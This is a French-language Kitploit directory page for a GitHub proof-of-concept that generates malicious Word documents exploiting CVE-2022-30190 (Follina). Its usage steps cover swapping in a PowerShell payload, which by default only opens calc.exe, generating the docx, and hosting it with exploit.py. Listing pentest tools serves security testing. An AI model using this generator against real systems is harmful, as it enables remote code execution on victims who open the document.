Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-30190 — Générateur de documents PoC MS-MSDT Follina CVE-2022-30190 | Kitploit
Outils/GitHubGitHub/sudoaza/cve-2022-30190
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubsudoaza/cve-2022-30190

CVE-2022-30190

Générateur de documents PoC MS-MSDT Follina CVE-2022-30190

Voir le dépôt
72il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

MS-MSDT Follina CVE-2022-30190 PoC

Générateur de docx malveillant pour exploiter (exécution de code à distance Microsoft Office Word)

La création de ce script est basée sur le PoC CVE-2021-40444 par LockedByte et le write-up de Tothi

Utilisation

Modifiez d'abord backup.html et remplacez le payload PowerShell. Pour l'instant, il se contente d'ouvrir calc.exe via IEX('calc.exe').

python3 exploit.py generate http://<SRV IP>

Génération du document

Une fois que vous avez généré le docx malveillant (il se trouvera dans out/), vous pouvez mettre en place le serveur :

sudo python3 exploit.py host 80

Serveur

Enfin, testez le docx dans une machine virtuelle Windows :

Affichage de Calc

Télécharger l’outil